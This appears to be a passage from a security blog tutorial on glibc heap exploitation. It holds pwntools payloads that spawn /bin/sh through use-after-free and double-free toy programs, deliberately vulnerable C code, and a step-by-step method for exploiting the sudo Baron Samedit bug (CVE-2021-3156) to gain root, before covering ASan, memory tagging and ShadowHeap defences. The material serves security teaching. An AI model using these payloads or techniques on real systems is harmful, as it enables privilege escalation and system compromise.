payload += b"1\n"
payload += b"name\n"
payload += b"id\n"
payload += b"2\n"
payload += b"3\n"
payload += b"4\n"
payload += p64(0x7ffff7a31420) + b"\n"  # system address
payload += b"5\n"
payload += b"/bin/sh\n"
payload += b"6\n"
payload += b"7\n"

with open("uaf.bin", "wb") as f:
    f.write(payload)

Double Free (DUP)

Double free occurs when a previously allocated heap chunk is freed more than once thereby corrupting the heap state; the same chunk would be inserted multiple times into free lists (e.g. fastbins). On subsequent allocations, the allocator may return the same memory address to two different calls to malloc(), creating a situation where two separate structures share the same memory.

Unlike smallbin or largebin, fastbins don’t verify chunk headers like prev_size, size. If tcache is out of the way, double free (non-consecutive) can be achieved; non-consecutive because malloc has the following check:

Now because of the LIFO semantic of fast bin indexing, freeing the same chunk twice will be detected. To defeat it another chunk needs to be placed before.

Here is a very naive poc:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char name[8];
    char *id;
} User;


typedef struct {
    void (*print)(char* data);
} UserPrinter;

UserPrinter *printer;
User *user;

void print_user() {
    if(printer){
        printer->print(user->id);
        printer->print(user->name);
    }
}

void do_print(char *data) {
    printf("data: %s\n", data);
}

void create_user() {
    char name_input[9], id[9];
    printf("update new user.\n");
    printf("enter user name: \n");
    if (!fgets(name_input, sizeof(name_input), stdin)) return;
    name_input[strcspn(name_input, "\n")] = 0;

    printf("enter user id: \n");
    if (!fgets(id, sizeof(id), stdin)) return;
    id[strcspn(id, "\n")] = 0;
    printf("id is %s", id);
    char *id_ptr = strdup(id);
    User *u = malloc(sizeof(User));
    memcpy(u->name, name_input, 7);
    u->name[7] = 0;
    u->id = id_ptr;
    user = u;
}

void delete_user() {
    char *usr_id = user->id;
    free(user);
    free(usr_id);
    free(user);
    user=NULL;
}

void create_printer() {
    printer = malloc(sizeof(UserPrinter));
    printer->print = do_print;
}


int main() {
    setbuf(stdout, NULL);
    int choice;
    while (1) {
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1: create_user(); break;
            case 2: delete_user(); break;
            case 3: create_printer(); break;
            case 6: print_user(); break;
            case 7: exit(0);
            default:break;
        }
    }
    return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char name[8];
    char *id;
} User;


typedef struct {
    void (*print)(char* data);
} UserPrinter;

UserPrinter *printer;
User *user;

void print_user() {
    if(printer){
        printer->print(user->id);
        printer->print(user->name);
    }
}

void do_print(char *data) {
    printf("data: %s\n", data);
}

void create_user() {
    char name_input[9], id[9];
    printf("update new user.\n");
    printf("enter user name: \n");
    if (!fgets(name_input, sizeof(name_input), stdin)) return;
    name_input[strcspn(name_input, "\n")] = 0;

    printf("enter user id: \n");
    if (!fgets(id, sizeof(id), stdin)) return;
    id[strcspn(id, "\n")] = 0;
    printf("id is %s", id);
    char *id_ptr = strdup(id);
    User *u = malloc(sizeof(User));
    memcpy(u->name, name_input, 7);
    u->name[7] = 0;
    u->id = id_ptr;
    user = u;
}

void delete_user() {
    char *usr_id = user->id;
    free(user);
    free(usr_id);
    free(user);
    user=NULL;
}

void create_printer() {
    printer = malloc(sizeof(UserPrinter));
    printer->print = do_print;
}


int main() {
    setbuf(stdout, NULL);
    int choice;
    while (1) {
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1: create_user(); break;
            case 2: delete_user(); break;
            case 3: create_printer(); break;
            case 6: print_user(); break;
            case 7: exit(0);
            default:break;
        }
    }
    return 0;
}

Basically first a user is created, then deleted, next, printer object is allocated and user is created again; the address of the function pointer (print()) can then be set by manipulating the user's name field.

The exploit is very similar to the previous uaf exploit.

from pwn import *

from pwn import *

payload = b""
payload += b"1\n"
payload += b"name\n"
payload += b"id\n"
payload += b"2\n"
payload += b"3\n"
payload += b"1\n"
payload += p64(0x7ffff7a31420)  #name
payload += b"/bin/sh\n" #id
payload += b"6\n"
payload += b"7\n"

with open("dup.bin", "wb") as f:
    f.write(payload)

Unitialised Read (UR)

An uninitialized read occurs when a program allocates memory on the heap using malloc() and then reads from that memory without first initializing it, e.g assuming that it has already been populated by some other logic. Since malloc() does not zero out the allocated memory, the contents of the chunk may contain leftover data (e.g token, heap addresses) from previous heap allocations/deallocations. If the program then logs this data or returns it to the user, an attacker could observe the leaked information, leading to a confidentiality breach.

Here are two examples illustrating the above concern.

typedef struct {
    char id[8];
    char name[8];
} Chunk;

int main() {
    Chunk *chunk1, *chunk2;
    chunk1 = malloc(sizeof(Chunk));
    printf("allocating chunk1\n");
    strcpy(chunk1->id, "id-1");
    strcpy(chunk1->name, "chunk-1");
    printf("chunk1 heap address %p\n", chunk1);
    printf("chunk1 name: %s\n", chunk1->name);
    printf("freeing chunk1\n");
    free(chunk1);
    printf("allocating chunk2\n");
    chunk2 = malloc(sizeof(Chunk));
    printf("chunk2 heap address %p\n", chunk2);
    printf("[chunk2] uninitialized read from chunk2 name: %s\n", chunk2->name);
    free(chunk2);
    return 0;
}

#include <stdio.h>
#include <stdlib.h>

typedef struct {
    char id[8];
    char name[8];
} Chunk;

int main() {
    Chunk *chunk00 = malloc(sizeof(Chunk));
    Chunk *chunk01 = malloc(sizeof(Chunk));

    Chunk *chunk1;
    Chunk *chunk2;

    chunk1 = malloc(sizeof(Chunk));
    free(chunk00);
    free(chunk01);
    free(chunk1);
    chunk2 = malloc(sizeof(Chunk));
    printf("uninitialized read from chunk with name(i.e heap pointer address): %p\n", chunk2->id);
    free(chunk2);
    return 0;
}

CVE-2021-3156 (Baron Samedit)

CVE-2021-3156 is a heap-based buffer overflow (off-by-one defect) affecting sudo. Sudo stands for superuser do and enabled system administrators to provide certain users the capability to execute some commands as root. The vulnerability allows non-root users to escalate their privilege and gain root code execution by passing carefully crafted command-line arguments. Specifically, sudo binary has setuid bit set, meaning when you execute it, it runs with effective uid 0 or root.

Before doing anything, sudo execute security checks and permissions via sudoers and this is where the memory defect exists.

Vulnerability Analysis

The vulnerability was discovered by Qualys research team. They have a great blog post explaining the memory defect and how the vulnerability was discovered.

The sudo version I used in this post is 1.8.21, installed it with the following flags CFLAGS='-g -O0' ./configure --prefix=/tmp/sudo-debug --enable-static-sudoers.

Now let's deep dive into the defect, specifically, the argument parsing logic in sudoers.

Basically, when sudo program runs, it parses command line arguments using parse_args():

With the -s option, the MODE_SHELL flag is set.

Sudo plugins are then loaded including sudoers_policy.

Next, sudo triggers a policy check which calls sudoers_policy_check for sudoers_policy. As shown below, call is delegated to sudoers_policy_main,

set_cmnd() is then invoked to fill in user_cmnd, user_args, and apply any command-specific defaults entries.

set_cmnd() allocates a heap malloc chunk (user_args) to store passed command-line arguments concatenated using space (i.e instead of /x00 there would be space).

As shown below the size is computed using strlen():

So far so good, BUT if you look at the code copying the arguments to the heap buffer:

The condition if (from[0] == '\' && !isspace((unsigned char)from[1])) is used to skip a backslash. This is because the function assumes a previous meta characters escaping was done in parse_args():

However, escaping is conditional. If the code assumes every backslash has a following meta character, then an argument that ends with \ causes the inner loop to advance past the string terminator and keep copying until it hits an unrelated '\0' in memory, incrementing to (overflow). After the first argument finishes, the for loop reinitializes from to the next argv element but does not reset to to the start, so subsequent arguments are appended into adjacent heap memory, further corrupting the heap.

In normal sudo execution, before set_cmnd() is called, arguments go through sanitization (meta-character escaping and other checks). That means the overflow bug inset_cmnd() is not directly triggerable when you run sudo /bin/ls, for example. In the sudoedit path, things are different, the mode is set to MODE_EDIT (0x2), flags contains MODE_SHELL (0x20000), Because of that combination, set_cmnd() still gets invoked but the earlier sanitization step is skipped in this execution mode. This is what Qualys found out in order to reach the vulnerable argument-copying logic through sudoedit, but not through regular sudo and make the bug exploitable through the sudoedit path, where mode = MODE_EDIT (0x2) and flags = MODE_SHELL (0x20000), as the code path bypasses the normal sanitization.

As shown below, set_cmnd is reached with MODE_SHELL enabled while having MODE_EDIT instead of MODE_RUN.

As a result, unescaped backslashes make it through, triggering the heap overflow (e.g. using sudoedit -s '\' perl -e 'print "A" x 65536', the first argument \ is enough to corrupt the heap state). As shown below, the heap is corrupted.

That's it for the vulnerability analysis, let's redirect our focus now to the vulnerability exploitation.

Vulnerability Exploitation

While reading the source code entirely is time consuming, I quickly reviewed this blog post https://www.nccgroup.com/research-blog/exploiting-the-sudo-baron-samedit-vulnerability-cve-2021-3156-on-vmware-vcenter-server-70/ to understand which target data structure could be leveraged, and then began developing the PoC myself.

Sudoers essentially maintains a linked list of defaults data structures, and three of them can be chained together to achieve code execution with root privileges. However, as noted in the blog post, these structures can only be corrupted if tcache is disabled.

Let’s examine the current state of the heap , specifically which chunks are available by inspecting the different malloc indexes, including fast bins, large bins, and small bins. As shown below, as expected, the tcache bin is empty and there is a single chunk at address 0x555555785660, located just above the target defaults data structure, which can be used for the overflow.

As shown below, the size of the malloc chunk is 0x1471 (5233 in decimal). Since we fully control the size of the arguments, we can force malloc to hand us this chunk.

As shown below, we were able to allocate it. However, the requested size must be slightly smaller because malloc adds an 8-byte header overhead and may apply alignment. The size also needs to be tuned carefully to prevent a leftover portion of the chunk from being split off and placed into the unsorted bin as the last remainder. To avoid this, we must consume the entire chunk, which is possible by requesting a size of 5220. As shown below, there is no split in this case.

But now there is a problem: even if we consume the entire chunk, there remains a large gap between the end of the allocated user buffer and our intended target. his gap prevents a direct overwrite.

However, this is not a fatal limitation. As explained earlier, by ending the argument with a trailing backslash, the copy loop will continue writing into the heap until it encounters a null byte (from != 0x00). In practice, this means we can simply fill the intervening gap with garbage data until we reach the first defaults structure, then carefully place our crafted payload. This allows us to corrupt the sudoers data structure, after which the subsequent function logic will complete the job.

Specifically, if one places n arguments ending with a backslash and lets k denote the size of the final argument that does not end with a backslash, then the amount of overflow can be expressed neatly with the formula: \( \frac{n.n+1}{2} + nk + n\). Here is why: for the first argument, the loop copies n zero bytes into the heap, followed by k bytes, and then appends a single space (instead of the final null terminator), for the second argument, the loop copies n-1 zero bytes, then again k + 1 (the data plus the space), and so on.The sequence of contributions is then (n+k+1)+(n−1+k+1)+⋯+(1+k+1) i.e \( \sum_{i=0}^{n-1} (n-i+k+1) = \frac{n.n+1}{2} + nk + n \). Once this overflow spans the gap between the user buffer and the target data structure, the attacker can append carefully chosen data to overwrite the sudoers defaults structures. This can be confirmed. Let n=194 and k=5, Using sudoedit -s '\' '\' '\' ... 'AAAAA' with 30 trailing backslashes and a last argument of 5 characters (AAAAA), the formula gives (30 . 31)/2) + 30 .5 + 30 = 645 add to that 4 bytes 'AAAAA' + 1 space = 6, amount of bytes written is then 645 +6 = 651 = 0x28b. Inspecting the pointer to in GDB matches this prediction (see figure below).

However, there is an easier approach: instead of carefully tuning n andk, one can simply fill the allocated chunk completely and overwrite the last byte with a backslash. This forces the copy loop to continue past the end of the user argument buffer. Due to the way the process memory layout is organized, the next region after the argument vector in memory is the environment array (envp). Thus, the overflow seamlessly continues into env[0] and subsequent environment entries. The gap between the end of the allocated chunk and the start of the target defaults structures can then be padded with garbage data derived from the environment strings, followed immediately by the crafted fake data to corrupt the sudoers defaults structures.

Once the corruption is in place, the next stage is triggered by update_defaults(). The routine walks the linked list of defaults entries (using next) and updates the global sudo_defs_table. After corruption, the controlled data influences how entries are inserted into that table (this is crucial).

At this point, the goal is to reach log_warningx(), which reads from sudo_defs_table and eventually calls send_mail(). Since send_mail() spawns the binary referenced in the mailer path entry, this gives us a reliable code-execution primitive as root.

A few critical constraints must be met between the corruption and the invocation of log_warningx, ideally no free() calls should hit the corrupted region. If one does, glibc detects heap inconsistencies and aborts with a memory corruption error. Additionally, allocations can occur safely as the overwrite ended before touching free chunks, so the traversal proceeds without triggering heap checks.

For the forged defaults chain, three fake entries are required, fake mailer path entry points to our malicious binary:

Fake mail flags entry ensuring send_mail() doesn’t segfault when it calls strdup() on flags:

and finally terminator entry with its next pointer set to NULL (0x0), so the traversal ends cleanly.

Another requirement comes from set_default(d->var, d->val, d->op, d->file, d->lineno, quiet). If the variable index in the corrupted defaults entry is invalid, the function returns false and triggers a warning which is what drives execution down into log_warningx().

You probably also observed this condition that is required to process the default entry:

By using a crafted type = 269 and a fake binding in memory, we satisfy the condition needed to process the corrupted defaults entry while still forcing the warning path.

One can also check that the sudo_defs_table were tampered with:

As a result, when update_defaults() encounters our tampered entries, the loop unwinds into log_warningx(). That in turn invokes send_mail(), which executes our fake mailer binary from sudo_defs_table with elevated privileges.

At this point, the exploit chain is complete, the malicious binary runs as root, and the vulnerability exploitation is finished.

if one define a binary code as follows:

After running the exploit code, one can check the file and inspect if it outputs root ; in this case the binary was in fact invoked with elevated privileges:

Notes

There are other type of exploits targeting other type of internal data structures even when tcache is enabled (e.g https://syst3mfailure.io/sudo-heap-overflow/, https://github.com/worawit/CVE-2021-3156/tree/ee2506c68ebecc22228c4e5f8a5eaa7544496961).

Still, once you go through the exercise at least once, you are free to experiment with the overflow mechanics and refine your own exploitation strategies and even start hunting for other memory defects (and naturally report them responsibly).

Defeating ASLR

If the base address of the heap is known, and the same arguments, glibc version, and environment are used, the address of a previously allocated target chunk as well as the address of the defaults structure can be immediately predicted. As shown below, the distance from defaults remains constant due to fixed alignment and the relatively deterministic nature of allocations.

Similarly, the distance from the heap base address is consistent.

This allows to create adaptive exploits consuming the heap base as an argument and generating a payload that places all objects at predictable locations in memory.

If, however, the base address is unknown, it can be brute-forced by retrying until a success condition is observed (for example, when a specific file or flag is created on disk).

On 64-bit Linux, ASLR typically randomizes up to 28-32 bits of entropy for the heap. Example heap base addresses:

0x55fe49ce2000  
0x55da4e766000  
0x555f8ce2f000  
0x563f368f1c60  
0x55641e20f000

Because heap bases are always page aligned typically 4 KB, the lower 12 bits are 0, that is, maximum entropy is reduced. If the ASLR varies 32 bits, that’s effectively \( 2^(32−12) = 1,048,576 \) page positions.

One can check the effective ASLR entropy as follows:

As said earlier, other exploits exists, for instance in https://syst3mfailure.io/sudo-heap-overflow/, you don't really need to defeat ASLR. Instead a specific configuration needs to be found which creates a big whole sitting before a target structure (by manipulating env variables that leads to malloc/free allocations/deallocations). Specifically the target field is placed directly in memory and thus one does not need to manipulate pointers:

typedef struct service_user
{
  /* And the link to the next entry.  */
  struct service_user *next;
  /* Action according to result.  */
  lookup_actions actions[5];
  /* Link to the underlying library object.  */
  service_library *library;
  /* Collection of known functions.  */
  void *known;
  /* Name of the service (`files', `dns', `nis', ...).  */
  char name[0];
} service_user;

https://elixir.bootlin.com/glibc/glibc-2.28/source/nss/nsswitch.h#L61

How2heap repo

There are plenty of scenarios that can be created to exploit a heap-related vulnerability . How2heap houses various heap exploitation techniques including proof-of-concept code snippets.

Defending Against Heap Exploitations

Address Space Layout Randomization (ASLR)

Address Space Layout Randomization (ASLR) is a widely used mitigation that increases the unpredictability of a process’s memory layout. Each run of a program randomizes the starting or base addresses of code, stack, heap, and other memory segments, thereby augmenting the search space and reducing exploitability. On 64-bit systems, typically around 28–36 bits of entropy is used (billions of possibilities) in contrast to 32-bit systems which uses 16-bit of entropy (search space isn’t that large and can be easily exhausted). Because brute-forcing these addresses is often impractical, attackers typically rely on information leaks to bypass ASLR.

Sanitizers

Sanitizers are used during the development or testing phase of target programs ( due to high overheads; for example ASan has 0.904× runtime overhead and 17.55× memory overhead on average). They are used to catch memory defects as early as possible (i.e not at runtime). By tracking metadata properties of heap allocated objects i.e virtual base address and size (spatial) and allocation time/birthmark (temporal), metadata propagation, exercising security checks during objects access, they are capable to enforce (partial) spatial and temporal memory safety.

Address Sanitizer (Asan)

AddressSanitizer or Asan is a widely known sanitizer that detects memory defects in heap, stack, and globals. It works via compiler instrumentation where extra checks are inserted around every C/C++ load and store. Additionally, standard library functions such as malloc, free, memcpy, strcpy, and others are replaced or wrapped so ASan can add redzones, quarantine freed memory, and validate accesses. ASan is used in fuzz testing/AFL and feedback application security testing (FAST).

ASan uses a shadow memory with an 8:1 mapping. Each 8 bytes of application memory are represented by 1 shadow byte. The shadow memory is computed efficiently with:

Shadow = (Mem >> 3) + offset

Shadow byte value is 0 when all 8 bytes are addressable, 1–7 when first n bytes valid, remaining poisoned. Negative values (e.g. 0xF5, 0xFA) signals poisoned states like use-after-free.

In order to detect spatial memory corruptions, ASan places redzones around allocated memory. When a poisoned byte is read; an error is reported. To cope with temporal defects, freed chunks are moved into a quarantine area. Their shadow bytes are marked as poisoned ( 0xF5) and any access would be catched.

Here is a simplified example of an instrumented access:

// Original
*addr = value;

// Probed
if (is_poisoned(addr)) {
    report(addr, size);
}
*addr = value;

ASan has several limitations. For instance, it is incapable of checking programs using inline assembly and checking pre-compiled binaries. Finally, due to significant overhead, ASan is not intended for production use.

Memory Tagging (Hardware assisted)

When pure software approaches (like AddressSanitizer) impose prohibitive overhead, hardware support can greatly reduce the cost. Memory Tagging provides probabilistic detection of temporal and spatial memory defects without the use of redzones and quarantines contrasting with vanilla AddressSanitizer (and thus is expected to impose less memory overhead). However, both AddressSanitizer and Memory tagging requires patching malloc/free (heap) and compiler instrumentation (stack).

The idea of MTE or memory tagging to assign a tag to each memory allocation and store a corresponding tag in the pointer. On every memory access, the hardware checks whether the pointer’s tag matches the tag of the target memory block. If there is a mismatch, the processor raises a fault. Specifically, out-of-bounds accesses are caught if they land in a block with a mismatched tag, Use-after-free can be detected because freed memory is re-tagged before reuse. With 4-bit tags, there are 16 possible values, with probability 15/16 (93%), the new tag differs and the defect is catched while with probability 1/16 (6%), the defect is not detected. Thus, memory tagging offers probabilistic protection, but at hardware speed and with much lower overhead than software-only sanitizers. Additionally, MTE is not capable of catching overflows within 16 byte granules:

char *array = new char[23]; // actually reserved as 32-byte granule
array[24] = 0;              // still inside the same granule

Memory Tagging typically works at 16-byte granules. On 64-bit ARM, tags are stored in the unused high bits of pointers, enabled by Top Byte Ignore (TBI). Regarding tags storage, memory tags are kept in hardware-protected metadata memory, inaccessible to normal programs. To use the tagging system, the runtime must set and clear tags on malloc/free, and compilers must insert instructions to tag stack frames and local variables.

ARM MTE and LLVM Support

ARM’s Memory Tagging Extension (MTE) provides hardware instructions for tag assignment and checking. LLVM supports two sanitizers: HWASan (Hardware-Assisted AddressSanitizer) and MemTagSanitizer. The former uses TBI to embed tags in pointer high bits but still relies on software to store and check tags, so overhead remains significant. The later uses full hardware support from ARM MTE, with hardware-managed tag memory lowering runtime overhead (intended for both testing and potential production use; heap tagging is not yet fully supported)

Finally, let's stress that memory tagging is not deterministic; collisions allow some bugs to slip through. With 4-bit tags, false negatives occur ~6.25% of the time. And while HWASan, while faster than pure ASan, still has notable runtime overhead.

source: https://www.computer.org/csdl/proceedings-article/eurosp/2024/542500a311/1ZChbvPTsIg

ShadowHeap (research prototype)

ShadowHeap suggests placing a mitigation layer sitting between the user application and the libc functions i.e., using probing similar to how RASP/ADR and other security technologies work.

https://jowua.com/wp-content/uploads/2022/12/jowua-v12n4-1.pdf

They used a wrapper approach using LD_PRELOAD and proposed a natural approach: maintain a snapshot (in a shadow memory region or heap) of chunk metadata, including metadata for in-use, freed, and top chunks. Specifically, ShadowHeap provides different levels of protection: Free, Bin, and Top Chunk Protection. Free Protection: Upon each malloc() call, the returned pointer and its metadata are copied. On free(), the chunk’s metadata is verified against the shadowed version. However, this has inherent limitations e.g., a chunk must be released to verify its metadata. As explained earlier, metadata of already freed chunks may still be manipulated. Bin Protection: the unsorted bin and the tcache are protected by storing metadata for each entry: 32 bytes for the unsorted bin ( fd, bk, previous size, and size) and 24 bytes for the tcache ( fd, size, and previous_size). Upon each allocation or deallocation, all elements in these bins must be persisted to ShadowHeap. Any subsequent call triggers validation of all elements thus the time complexity is O(n), where n is the number of chunks in the bins. Protection for the large and small bin has not been implemented as their size is unbounded meaning that the memory and time overhead of protecting every linked chunk in these bins could be very very high. Top Chunk Protection: involves maintaining a shadow copy of the top chunk .Since there are no pointers from malloc() chunks to the ShadowHeap, it mitigates the possibility of adversaries targeting the ShadowHeap using heap-based attacks.

Finally, note that ShadowHeap still has limitations, particularly due to performance constraints. It cannot defend against certain categories of attacks, such as those manipulating the prev_inuse field, which requires special handling , specifically probing should be integrated directly into the allocator, and mitigations applied within the malloc implementation itself (naturally this would incur a lot of overhead). Additionally, the current implementation has only been tested in a single-threaded scenario, and further benchmarking especially on web servers is necessary to obtain a broader view of performance.

Conclusion

As previously discussed, the glibc heap implementation incorporates various integrity checks during memory allocation and deallocation. While these checks certainly make exploitation more difficult, true security comes from robust design rather than integrity checks. Dedicated attackers can often find ways to bypass even the most robust mitigations. Therefore, deploying sensors, collecting telemetry, and maintaining continuous visibility into system behavior is crucial.

If you found an error or you think I misunderstood something, please reach out.